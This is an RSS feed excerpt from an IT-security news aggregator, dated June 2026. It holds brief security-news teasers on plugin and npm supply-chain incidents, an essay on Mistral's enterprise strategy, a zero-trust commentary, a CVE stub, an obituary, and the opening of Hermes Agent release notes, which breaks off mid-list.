<link>https://tsecurity.de/de/3615166/it-security-nachrichten/ai-agent-supply-chain-risk-found-in-23-clawhub-plugins-using-official-looking-namespaces/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615166/it-security-nachrichten/ai-agent-supply-chain-risk-found-in-23-clawhub-plugins-using-official-looking-namespaces/</guid>
<pubDate>Mon, 22 Jun 2026 12:39:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Manifold Security recently discovered 23 code-executing plugins on ClawHub that improperly used official organizational namespaces. These plugins were published under the @openclaw/ and @clawhub/ scopes by third-party accounts with no connection to the actual organizations. This discovery highlights a significant supply chain vulnerability in the rapidly expanding AI agent ecosystem. ClawHub is a popular registry […]</p>
<p>The post <a href="https://cyberpress.org/clawhub-plugins-pose-risk/">AI Agent Supply Chain Risk Found in 23 ClawHub Plugins Using Official-Looking Namespaces</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Is Mistral late or savvy?]]></title>
<description><![CDATA[For the past few years, the most visible corner of the AI market has been easy to caricature: OpenAI gets the consumer attention, Anthropic gets the developer love, Google gets the benefit of the doubt with increasingly capable models and a complementary product suite, and everyone else gets to e...]]></description>
<link>https://tsecurity.de/de/3614975/ai-nachrichten/is-mistral-late-or-savvy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614975/ai-nachrichten/is-mistral-late-or-savvy/</guid>
<pubDate>Mon, 22 Jun 2026 11:19:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For the past few years, the most visible corner of the AI market has been easy to caricature: OpenAI gets the consumer attention, Anthropic gets the developer love, Google gets the benefit of the doubt with increasingly capable models and a complementary product suite, and everyone else gets to explain why they’re not dead yet.</p>



<p>That’s unfair, of course, but not completely wrong. In AI, attention compounds and it’s leading to outsized revenue, with both <a href="https://www.reuters.com/technology/openai-files-us-ipo-after-anthropic-ai-giants-head-public-markets-2026-06-08/">OpenAI</a> and <a href="https://www.reuters.com/business/ai-giant-anthropic-confidentially-files-us-ipo-2026-06-01/">Anthropic</a> reportedly rushing toward trillion-dollar-sized IPOs on the backs of billions in revenue.</p>



<p>So it’s easy to underrate Mistral AI.</p>



<p>Honestly, I hadn’t thought of the Paris-based company for a year. Maybe longer. But then <a href="https://www.linkedin.com/feed/update/urn:li:activity:7472694983636971520/">Brian Hall announced he’s joining Mistral</a> as CMO, and I had an <a href="https://arresteddevelopment.fandom.com/wiki/Her%3F">Arrested Development “Her?” moment</a>. Hall, a longtime Microsoft exec, hired me at AWS and went on to run product marketing at Google Cloud. His move prompted curiosity because Mistral doesn’t dominate developer chatter in the United States or boast the same seemingly endless compute budgets as Anthropic or OpenAI. If the AI market is simply a race to build the biggest, most magical, most general-purpose model, Mistral isn’t the company to bet on.</p>



<p>But that’s the wrong question, and likely the wrong bet.</p>



<p>The more interesting question is when the enterprise AI market will revert to type and demand that AI deliver the same security, predictability, and control we’re used to from other IT investments. Here Mistral has a real story. As Hall notes, Mistral’s approach is to “prioritize AI for mission-critical environments that need the confidence and self-control to bet for the long term (with open weights and real sovereign capabilities).”</p>



<p>While this might have sounded like an overly hopeful talking point, it became real in June when <a href="https://www.reuters.com/technology/us-blocks-foreign-access-anthropics-most-advanced-ai-models-axios-reports-2026-06-13/">the US government ordered Anthropic to suspend access</a> for foreign nationals to its most advanced Fable 5 and Mythos 5 models. Anthropic said it would disable the models for all users because of the export-control directive. “Can this vendor be forced to turn us off?” is no longer a theoretical question.</p>



<p>That’s why Mistral’s quiet focus on enterprise control just might work.</p>



<h2 class="wp-block-heading"><a></a>The wrong race</h2>



<p>The enterprise control story is much more compelling than the narrative I used to hear. You know, the “Europe needs its own OpenAI” schtick. There is a market for “patriotic AI,” but it’s relatively small. The far bigger market is comprised of enterprises that just want AI that works, costs less (or delivers more) than expected, and can be customized while fitting their compliance requirements.</p>



<p>Though the company’s <a href="https://web.archive.org/web/20230726224506/https:/mistral.ai/">initial launch page</a> went out of its way to mention that the company was operating out of Europe and headquartered in Paris, since at least <a href="https://web.archive.org/web/20231030012147/https:/mistral.ai/">October 2023 Mistral’s product posture has centered on enterprise control</a>. Scattered throughout its current (and past) website are words like “customize,” “fine-tune,” “open source,” and “complete control.” Mistral pitches Studio for building and running AI apps, Forge for custom model training and alignment, Vibe for agentic work, Vibe for Code for coding workflows, and Compute for training and inference infrastructure. The company talks about observability, evals, guardrails, deployment portability, and running production AI “from edge to cloud.”</p>



<p>In other words, it sounds less like a chatbot company and more like an infrastructure company.</p>



<p>That positioning becomes clearer when you look underneath the product names.<a href="https://mistral.ai/news/ai-studio/"> Mistral AI Studio</a> includes an AI Registry that acts as a system of record for agents, models, data sets, judges, tools, and workflows. It tracks lineage, ownership, and versioning. It enforces access controls and promotion gates before deployment. That’s boring governance plumbing (and “boring” is good in enterprise IT, <a href="https://www.infoworld.com/article/4082782/boring-governance-is-the-path-to-real-ai-adoption.html">as I’ve written</a>).</p>



<p><a href="https://mistral.ai/news/forge/">Forge</a> may be even more important. Mistral describes it as a way for enterprises to train frontier-grade models on proprietary enterprise data. Rather than training on others’ copyrighted information strewn across the web or on a mountain of Reddit posts, Forge goes well beyond <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">retrieval-augmented generation</a> (RAG) to not simply “read in” proprietary docs/info/etc., but rather to give an enterprise its own private OpenAI, as it were. </p>



<p>That’s super interesting.</p>



<p>But is it different? I mean, OpenAI and Anthropic can do plenty of this, with greater scale and the benefit of leading frontier models. Both have enterprise products, cloud partnerships, evals, agents, governance tools, and varying forms of model customization. Mistral’s bet with Forge isn’t that the big labs can’t customize models. It’s that some enterprises aren’t interested in customization as a side feature bolted onto a frontier API. It <em>is </em>the product. OpenAI and Anthropic can build everything around Forge but not Forge itself, because the one thing they almost certainly aren’t interested in selling is independence from them.</p>



<p>This is where Mistral may have found a useful seam, one that allows it to ask a different set of questions. What if the best enterprise model isn’t the smartest general-purpose model? What if the best model is the one that’s small enough to run where the customer needs it, open enough to inspect and adapt, cheap enough to use broadly, and specialized enough to do the job? What if “good enough, governable, and your own” beats “slightly smarter, mostly opaque, and rented”?</p>



<p>This won’t matter for every use case, of course. If I’m asking AI to reason through a spreadsheet or write code, I probably want the best model I can get. But for banks, defense agencies, manufacturers, utilities, telcos, and governments, “best” is multidimensional and includes questions like latency, auditability, etc. It’s why banks, for example, still run so many workloads on premises: They want control.</p>



<h2 class="wp-block-heading"><a></a>What about compute?</h2>



<p>None of this makes compute irrelevant. But it may change <em>how</em> compute matters.</p>



<p>If Mistral is trying to be a French version of OpenAI, its lack of hyperscale compute is a fatal weakness. It won’t outspend OpenAI, Oracle, Microsoft, Google, Amazon, SpaceX, or Anthropic. It probably won’t out-recruit them across every frontier research area, either. The AI market is already littered with companies that underestimated how quickly “good model” became “not good enough.”</p>



<p>But if Mistral is trying to become the enterprise-controlled AI layer for organizations that don’t want all intelligence to live behind someone else’s API, compute becomes a more nuanced issue. It still needs infrastructure, and Mistral seems to know it. After all, Mistral <a href="https://www.reuters.com/business/finance/frances-mistral-raises-830-million-debt-ai-data-centre-build-up-2026-03-30/">raised $830 million in debt to buy 13,800 Nvidia chips</a> for a data center near Paris. That’s a rounding error compared to OpenAI and Anthropic, of course, but the real question is whether Mistral can turn relative compute scarcity into a virtue, like <a href="https://www.amazon.jobs/content/en/our-workplace/leadership-principles">Amazon’s Leadership Principle “Frugality”</a> on steroids. If lower compute capacity leads Mistral to deliver smaller, more efficient, and more specialized models, which in turn helps enterprises maintain more control of their data at lower cost, then less really does become more.</p>



<p>Mistral’s compute challenge, then, is not to try and have as much compute as OpenAI. It’s to make customers care less about raw compute scale and more about deployment flexibility, specialization, and control.</p>



<p>That’s a hard sell. But it’s not a dumb one.</p>



<h2 class="wp-block-heading"><a></a>What Mistral must prove</h2>



<p>The bear case remains obvious. OpenAI has consumer distribution, developer mindshare, capital, and a brand that has basically become synonymous with AI. Anthropic has become the developer darling and has an unusually strong enterprise story of its own. Google has the models, the infrastructure, the data, and a bevy of complementary services. AWS, Microsoft, and Oracle have customer relationships and infrastructure.</p>



<p>Mistral has to prove that there’s room for another center of gravity. More specifically, it must prove three things.</p>



<p>First, it has to show that open-weight and controllable AI matter enough to influence buying decisions, not just conference panels. Everyone says they want control, just as most like the idea of open source. But proprietary software and cloud services still dominate the market. Mistral must make control feel like the easy button.</p>



<p>Second, it must prove that specialization beats generality in enough high-value markets. “Our model is almost as good” is not a strategy. “Our model is better for your bank, your government agency, or your retailer” just might be.</p>



<p>Third, it needs to establish a beachhead within enterprise IT before OpenAI and Anthropic become “boring” enough to satisfy the same buyers. This is the real race. The biggest AI companies are hiring enterprise sales teams, building admin controls, and cutting deals with every major cloud. Mistral’s window exists because the market is still young, but that window won’t stay open much longer.</p>



<p>If AI remains a model benchmark race, Mistral likely loses. But if AI keeps evolving to become grown-up enterprise infrastructure, Mistral has a real chance.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[23 ClawHub plugins squatting official scopes expose AI registry security gaps]]></title>
<description><![CDATA[Plugin registries for AI agents use npm-style scopes like @openclaw/ and @clawhub/ to signal who published a package. But on ClawHub, a registry whose plugins run with Claude, OpenClaw, and other agents, those official scopes weren’t reserved to their owners…
Read more →
The post 23 ClawHub plugi...]]></description>
<link>https://tsecurity.de/de/3614903/it-security-nachrichten/23-clawhub-plugins-squatting-official-scopes-expose-ai-registry-security-gaps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614903/it-security-nachrichten/23-clawhub-plugins-squatting-official-scopes-expose-ai-registry-security-gaps/</guid>
<pubDate>Mon, 22 Jun 2026 10:38:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Plugin registries for AI agents use npm-style scopes like @openclaw/ and @clawhub/ to signal who published a package. But on ClawHub, a registry whose plugins run with Claude, OpenClaw, and other agents, those official scopes weren’t reserved to their owners…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/23-clawhub-plugins-squatting-official-scopes-expose-ai-registry-security-gaps/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/23-clawhub-plugins-squatting-official-scopes-expose-ai-registry-security-gaps/">23 ClawHub plugins squatting official scopes expose AI registry security gaps</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[23 ClawHub plugins squatting official scopes expose AI registry security gaps]]></title>
<description><![CDATA[Plugin registries for AI agents use npm-style scopes like @openclaw/ and @clawhub/ to signal who published a package. But on ClawHub, a registry whose plugins run with Claude, OpenClaw, and other agents, those official scopes weren’t reserved to their owners for every package already published. I...]]></description>
<link>https://tsecurity.de/de/3614830/it-security-nachrichten/23-clawhub-plugins-squatting-official-scopes-expose-ai-registry-security-gaps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614830/it-security-nachrichten/23-clawhub-plugins-squatting-official-scopes-expose-ai-registry-security-gaps/</guid>
<pubDate>Mon, 22 Jun 2026 10:06:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Plugin registries for AI agents use npm-style scopes like @openclaw/ and @clawhub/ to signal who published a package. But on ClawHub, a registry whose plugins run with Claude, OpenClaw, and other agents, those official scopes weren’t reserved to their owners for every package already published. In this Help Net Security video, Ax Sharma, Head of Research at Manifold Security, breaks down how 23 code-executing plugins ended up under ClawHub’s official @openclaw and @clawhub scopes while … <a href="https://www.helpnetsecurity.com/2026/06/22/clawhub-code-executing-plugins-video/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/22/clawhub-code-executing-plugins-video/">23 ClawHub plugins squatting official scopes expose AI registry security gaps</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mastra npm Supply Chain Attack Delivers Node.js Implant and PowerShell Backdoor]]></title>
<description><![CDATA[Microsoft Threat Intelligence has uncovered a massive supply-chain attack on the npm registry, affecting over 140 packages within the Mastra ecosystem. The campaign relies on a hijacked maintainer account to distribute a malicious typosquat package, which deploys a stealthy Node.js implant and a ...]]></description>
<link>https://tsecurity.de/de/3614801/it-security-nachrichten/mastra-npm-supply-chain-attack-delivers-nodejs-implant-and-powershell-backdoor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614801/it-security-nachrichten/mastra-npm-supply-chain-attack-delivers-nodejs-implant-and-powershell-backdoor/</guid>
<pubDate>Mon, 22 Jun 2026 09:54:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft Threat Intelligence has uncovered a massive supply-chain attack on the npm registry, affecting over 140 packages within the Mastra ecosystem. The campaign relies on a hijacked maintainer account to distribute a malicious typosquat package, which deploys a stealthy Node.js implant and a PowerShell backdoor. Researchers attribute this highly coordinated attack to Sapphire Sleet, a […]</p>
<p>The post <a href="https://cyberpress.org/mastra-npm-backdoor-attack/">Mastra npm Supply Chain Attack Delivers Node.js Implant and PowerShell Backdoor</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GlassWorm Self-Propagating Worm Targets Developers Through VS Code and OpenVSX Extensions]]></title>
<description><![CDATA[A highly sophisticated, self-propagating malware known as GlassWorm has been actively targeting developers through malicious extensions on the Visual Studio Code Marketplace and the OpenVSX Registry. First identified in October 2025 by security researchers, this aggressive campaign compromised te...]]></description>
<link>https://tsecurity.de/de/3614630/it-security-nachrichten/glassworm-self-propagating-worm-targets-developers-through-vs-code-and-openvsx-extensions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614630/it-security-nachrichten/glassworm-self-propagating-worm-targets-developers-through-vs-code-and-openvsx-extensions/</guid>
<pubDate>Mon, 22 Jun 2026 08:22:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A highly sophisticated, self-propagating malware known as GlassWorm has been actively targeting developers through malicious extensions on the Visual Studio Code Marketplace and the OpenVSX Registry. First identified in October 2025 by security researchers, this aggressive campaign compromised tens of thousands of developer environments before major disruption efforts began. GlassWorm represents a major escalation in […]</p>
<p>The post <a href="https://cyberpress.org/glassworm-hits-extensions/">GlassWorm Self-Propagating Worm Targets Developers Through VS Code and OpenVSX Extensions</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why Southeast Asia CISOs Need Zero Trust as Their AI Control Plane – AI Agents, Data Borders and Supply Chains]]></title>
<description><![CDATA[At Zenith Live 2026 held on 16-17 June in Vienna, Zscaler sharpened a reality that Southeast Asia CIOs and CISOs are already sensing, which are, AI agents are quickly becoming digital workers inside their organisations, while regulators tighten data residency rules and supply‑chain attacks move c...]]></description>
<link>https://tsecurity.de/de/3614414/it-security-nachrichten/why-southeast-asia-cisos-need-zero-trust-as-their-ai-control-plane-ai-agents-data-borders-and-supply-chains/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614414/it-security-nachrichten/why-southeast-asia-cisos-need-zero-trust-as-their-ai-control-plane-ai-agents-data-borders-and-supply-chains/</guid>
<pubDate>Mon, 22 Jun 2026 05:23:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>At Zenith Live 2026 held on 16-17 June in Vienna, Zscaler sharpened a reality that Southeast Asia CIOs and CISOs are already sensing, which are, AI agents are quickly becoming digital workers inside their organisations, while regulators tighten data residency rules and supply‑chain attacks move closer to core business operations.<br><br>Zscaler’s solution is to extend its Zero Trust Exchange and SASE platform beyond users and workloads to AI agents, unmanaged devices, multi‑cloud workloads, and B2B partners, effectively positioning zero trust as the control plane for secure AI adoption in highly connected, highly regulated markets like Southeast Asia.<br><br>In my opinion, three moves stand out for Southeast Asia organisations at the AI layer:<br>1. An AI Broker with an Agent Registry that governs how AI agents talk to data, applications, and other agents, inspecting prompts and responses and enforcing least‑privilege access in real time. In my view, this is critical in sectors facing strict data‑handling rules across multiple jurisdictions.<br>2. Endpoint AI Security that exposes risky local AI tools, browser extensions, and plugins proliferating on endpoints across distributed workforces and contractor ecosystems common in Southeast Asia.<br>3. An AI Access Graph and AI Protect that map AI assets, model usage, and data flows across SaaS, public cloud, and on‑prem, backed by red‑teaming, prompt hardening, and guardrails for more than 250 GenAI apps.<br><br>Equally important for Southeast Asia region is how Zscaler handles cross‑border connectivity and sovereignty. The company’s Zero Trust B2B Exchange replaces site‑to‑site VPNs and MPLS links with policy‑controlled application access, so partners, outsourcers, and regional subsidiaries never sit on the same network. This is even as data and workflows move between markets. In parallel, its cloud is engineered for strict locality of logs and operations, with regional data centres and no external “kill switches”, a design clearly influenced by European GDPR and localisation demands that now echo in Southeast Asian data regimes.<br><br>On the ground, customer stories from AkzoNobel and Siemens Healthineers show what this looks like when applied decisively – “dark” branches that cannot be discovered on the internet, zero‑trust based B2B connectivity, and an explicit strategy to guide AI adoption rather than banning it.<br><br>For Southeast Asia CISOs, here is the practical message:<br>1. Build a <strong>live inventory of AI usage and data flow</strong>s across borders before regulators and auditors force the issue.<br>2. Hide your infrastructure and supply chain behind <strong>zero trust</strong>, so neither partners nor AI agents can turn a single misconfiguration into a regional incident.<br>3. Treat zero trust as your <strong>AI operating model</strong>, not a side project, because every new AI agent you deploy is now part of your workforce, your compliance posture, and your attack surface.</p>



<p><strong>My Recommendations for 3 Immediate Priorities for Southeast Asian CISOs in the AI Era</strong><br>1. <strong>Reframe the Threat Model Around Agents, Not Just Users</strong>  <br>a. Update threat models and control frameworks to explicitly include AI agents as identities: what they can access, what actions they can perform, and how they are monitored.<br>b. Classify agents by criticality and blast radius in the same way you do privilege human accounts and critical applications.<br><br>2. <strong>Cut Lateral Movement Before You Chase Every Vulnerability</strong> <br>a. Assume you will never patch everything, focus first on eliminating discoverability and lateral movement across branches, factories, and multi‑cloud workloads.<br>b. Use zero trust segmentation so a compromised agent, endpoint, or partner connection can only see and touch what policy explicitly allows.<br><br>3. <strong>Operationalise AI Guardrails and Evidence for Regulators </strong><br>a. Implement AI‑aware controls: AI Broker, guardrails for GenAI apps, data lineage via access graphs, and endpoint visibility into AI tools.<br>b. Ensure you can produce evidence such as logs, policies, lineage, showing how AI access is governed across borders, partners, and regulated datasets.<br><br></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-38033 | Microsoft Windows up to Server 2022 Registry Key information disclosure (EUVD-2022-40639)]]></title>
<description><![CDATA[A vulnerability was found in Microsoft Windows. It has been declared as problematic. This impacts an unknown function of the component Registry Key Handler. Executing a manipulation can lead to information disclosure.

This vulnerability appears as CVE-2022-38033. The attack may be performed from...]]></description>
<link>https://tsecurity.de/de/3613598/sicherheitsluecken/cve-2022-38033-microsoft-windows-up-to-server-2022-registry-key-information-disclosure-euvd-2022-40639/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613598/sicherheitsluecken/cve-2022-38033-microsoft-windows-up-to-server-2022-registry-key-information-disclosure-euvd-2022-40639/</guid>
<pubDate>Sun, 21 Jun 2026 14:38:49 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts an unknown function of the component <em>Registry Key Handler</em>. Executing a manipulation can lead to information disclosure.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2022-38033">CVE-2022-38033</a>. The attack may be performed from remote. There is no available exploit.

A patch should be applied to remediate this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[Doom Composer Bobby Prince Has Died]]></title>
<description><![CDATA[Video game composer and sound designer Bobby Prince has died at age 81 following an illness. Developer id software shared the news. Engadget reports: Prince was perhaps best known for his pioneering work on the Doom series. The Library of Congress inducted his soundtrack for the original game int...]]></description>
<link>https://tsecurity.de/de/3611310/it-security-nachrichten/doom-composer-bobby-prince-has-died/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611310/it-security-nachrichten/doom-composer-bobby-prince-has-died/</guid>
<pubDate>Fri, 19 Jun 2026 23:08:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Video game composer and sound designer Bobby Prince has died at age 81 following an illness. Developer id software shared the news. Engadget reports: Prince was perhaps best known for his pioneering work on the Doom series. The Library of Congress inducted his soundtrack for the original game into the National Recording Registry just last month. "Despite the limitations of the 1993-era sound card drivers, Prince composed the perfect riff-shredding accompaniment for the game's demon-slaying journey to hell and back," the Library of Congress stated.
 
"Taking advantage of his knowledge of MIDI, Prince even worked to ensure that the sound effects he created could cut through the music by assigning them to different MIDI frequencies." Prince also worked on games such as Wolfenstein 3D, Rise of the Triad and Duke Nukem 3D. In 2006, the Game Audio Network Guild honored Prince with a lifetime achievement award.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Doom+Composer+Bobby+Prince+Has+Died%3A+https%3A%2F%2Fgames.slashdot.org%2Fstory%2F26%2F06%2F19%2F1918208%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fgames.slashdot.org%2Fstory%2F26%2F06%2F19%2F1918208%2Fdoom-composer-bobby-prince-has-died%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://games.slashdot.org/story/26/06/19/1918208/doom-composer-bobby-prince-has-died?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.17.0 (v2026.6.19)]]></title>
<description><![CDATA[Hermes Agent v0.17.0 (v2026.6.19)
Release Date: June 19, 2026
Since v0.16.0: ~1,475 commits · ~800 merged PRs · 1,693 files changed · 235,390 insertions · 50,730 deletions · 300+ issues closed · 245 community contributors

The Reach Release. v0.16.0 put Hermes on your desktop. v0.17.0 is about ho...]]></description>
<link>https://tsecurity.de/de/3611226/downloads/hermes-agent-v0170-v2026619/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611226/downloads/hermes-agent-v0170-v2026619/</guid>
<pubDate>Fri, 19 Jun 2026 21:46:52 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.17.0 (v2026.6.19)</h1>
<p><strong>Release Date:</strong> June 19, 2026<br>
<strong>Since v0.16.0:</strong> ~1,475 commits · ~800 merged PRs · 1,693 files changed · 235,390 insertions · 50,730 deletions · 300+ issues closed · 245 community contributors</p>
<blockquote>
<p><strong>The Reach Release.</strong> v0.16.0 put Hermes on your desktop. v0.17.0 is about how far that reach extends — across new places to talk to it, deeper into the tools you already use, and out to the people running Hermes for a team. Hermes reached two new channels (iMessage via Photon, and the Raft agent network), the desktop app gained substantial new capability, subagents can now run in the background, image generation learned to edit, and Cursor's Composer model is reachable through an xAI Grok subscription. The dashboard got a full profile builder and secure login, the Skills Hub browser was rehauled, the <code>memory</code> tool got a major upgrade, and the curator stopped spending aux-model budget on every routine run. 300+ issues closed ride along, plus a security round.</p>
</blockquote>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Hermes reaches iMessage — Photon Spectrum, no Mac relay required</strong> — There's now an iMessage platform plugin built on Photon's managed line pool. Run <code>hermes photon login</code>, authenticate with a device code, and Hermes can send and receive iMessage — no Mac sitting in a closet running a relay, no BlueBubbles bridge to babysit. It's positioned as the successor to BlueBubbles: free to start, nothing to self-host. If your friends and family live in the blue bubbles, Hermes lives there now too. (<a href="https://github.com/NousResearch/hermes-agent/pull/32348" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32348/hovercard">#32348</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42582/hovercard">#42582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44713" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44713/hovercard">#44713</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Raft — Hermes joins the Raft agent network as a gateway channel</strong> — A new bundled Raft platform adapter lets Hermes connect to <a href="https://raft.build/" rel="nofollow">Raft</a> as an external agent through a wake-channel bridge. Set <code>RAFT_PROFILE</code>, run the bridge, and Raft can wake Hermes to handle messages — with a privacy-by-contract design where wake payloads carry only metadata (event IDs, timestamps), never message bodies. Another surface where Hermes can show up and do work. (<a href="https://github.com/NousResearch/hermes-agent/pull/48210" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48210/hovercard">#48210</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxchan">@xxchan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>A substantially more capable desktop app</strong> — v0.16.0 shipped the desktop app; v0.17.0 deepened it across dozens of PRs. Rebindable keyboard shortcuts, native OS notifications with per-type toggles, live subagent <strong>watch-windows</strong> that stream a delegated agent's activity into its own pane, a composer model selector with per-model presets, automatic RTL/bidi text direction, a resizable VS Code-themed terminal pane, per-thread composer drafts, and the ability to install <strong>any VS Code Marketplace theme</strong> directly into the app. The desktop is now a serious daily driver, not a preview. (<a href="https://github.com/NousResearch/hermes-agent/pull/45866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45866/hovercard">#45866</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40660/hovercard">#40660</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47060/hovercard">#47060</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46959" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46959/hovercard">#46959</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43292" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43292/hovercard">#43292</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44596" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44596/hovercard">#44596</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Background / async subagents — delegate work and keep going</strong> — <code>delegate_task(background=true)</code> now dispatches a subagent that runs in the background and returns a handle immediately. You and the model keep working while it churns, and the full result re-enters the conversation as a new turn the moment it finishes. Kick off a long research dive or a multi-step build, then carry on with something else instead of sitting blocked waiting on it. (<a href="https://github.com/NousResearch/hermes-agent/pull/40946" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40946/hovercard">#40946</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46968" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46968/hovercard">#46968</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
